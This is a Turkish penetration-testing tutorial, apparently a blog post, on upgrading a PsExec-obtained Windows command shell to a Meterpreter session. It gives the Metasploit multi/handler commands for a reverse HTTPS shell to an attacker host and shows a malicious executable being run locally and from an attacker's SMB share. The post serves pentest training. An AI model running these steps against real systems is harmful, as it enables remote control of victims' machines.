Sysinternals PsExec Aracı ile Erişim Sağlanan Windows Komut Satırından Meterpreter Komut Satırının Elde Edilmesi

Sızma testleri sırasında standart komut satırı elde edildikten sonra, Meterpreter komut satırı elde edilmesi gerekebilmektedir. Bu yazıda, Windows komut satırı elde edilmiş bir bilgisayarda hazırlanan zararlı bir uygulama ile Meterpreter bağlantısı elde edilecektir.

Sızma testi sırasında, 192.168.4.17 IP adresli “W7-Test” adlı Windows bir bilgisayarda, standart bir kullanıcı hakkı ile Windows komut satırı (cmd.exe) elde edilmiş olsun.

PsExec.exe \\192.168.4.17 cmd.exe -i 0

obtaining-meterpreter-shell-from-windows-command-line-via-msf-multi-handler-exploit-module-01

Meterpreter komut satırı elde etmek için ve saldırgana ait 192.168.4.32 IP adresli Kali bilgisayara ters HTTPS Meterpreter bağlantısı kuracak olan zararlı bir uygulama dosyasının oluşturulduğunu varsayalım.

obtaining-meterpreter-shell-from-windows-command-line-via-msf-multi-handler-exploit-module-02

Bu uygulama Windows bilgisayarın C:Users dizinine atıldıktan sonra, Windows komut satırında çalıştırılacaktır.

Oluşturulan uygulamanın gerçekleştireceği ters HTTPS Meterpreter bağlantısını dinleyecek olan MSF multi-handler istismar modülü aşağıdaki gibi ayarlanabilir.

use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_https
set ExitOnSession false
set LHOST 192.168.4.32
set LPORT 443
exploit -j

obtaining-meterpreter-shell-from-windows-command-line-via-msf-multi-handler-exploit-module-03

Artık, Windows komut satırında C:Users dizini altındaki zararlı uygulama çalıştırılabilir.

C:\Users\Zararli.exe

obtaining-meterpreter-shell-from-windows-command-line-via-msf-multi-handler-exploit-module-04

Böylece, MSF multi-handler istismar modülü üzerinde gelen talep yakalanmıştır.

obtaining-meterpreter-shell-from-windows-command-line-via-msf-multi-handler-exploit-module-05

İpucu: Zararlı yazılım, herkesin erişim sağlayabileceği bir sunucuya (web sunucusu, dosya sunucusu gibi), saldırgana ait Windows paylaşımına (192.168.4.54) veya Linux SAMBA paylaşımına (192.168.4.32) da konulabilir. Paylaşımdaki zararlı uygulama Windows komut satırında iken, “start” komutu ile çalıştırılabilir.

start \\192.168.4.54\HerkeseAcikPaylasim\Zararli.exe

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.